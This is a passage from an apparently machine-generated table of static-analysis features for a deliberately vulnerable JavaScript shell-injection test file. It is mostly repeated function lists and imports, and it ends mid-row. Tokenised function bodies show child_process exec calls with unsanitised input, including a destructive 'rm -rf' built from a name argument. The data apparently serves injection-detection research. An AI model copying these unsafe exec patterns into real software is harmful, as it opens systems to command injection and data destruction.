enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | exceptional return of cp.exec(cmd) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | exceptional return of cp.exec(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | exceptional return of cp.exec(cmd) | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | exceptional return of cp.exec(cmd) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | exceptional return of cp.exec(cmd) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:5:490:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:5:490:8 | exec | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:5:490:8 | exec | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:5:490:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:5:490:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | contextSurroundingFunctionParameters | (myCommand) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | enclosingFunctionBody | myCommand cmd cd cwd ; myCommand cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:10:490:12 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | module | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | module | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | require | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | this | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:1 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:2 | MyThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:2 | MyThing | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:2 | MyThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:2 | MyThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:493:2 | MyThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | 'arguments' object of anonymous function | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | exceptional return of anonymous function | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | functio ... OK\\n\\t}\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | functio ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | functio ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | functio ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | return of anonymous function | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:493:2:501:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:494:12 | MyThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing ... ss')\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing ... ss')\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing ... ss')\\n\\t} | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing ... ss')\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:6:496:2 | MyThing ... ss')\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:16:496:2 | {\\n\\t\\tcp: ... ss')\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 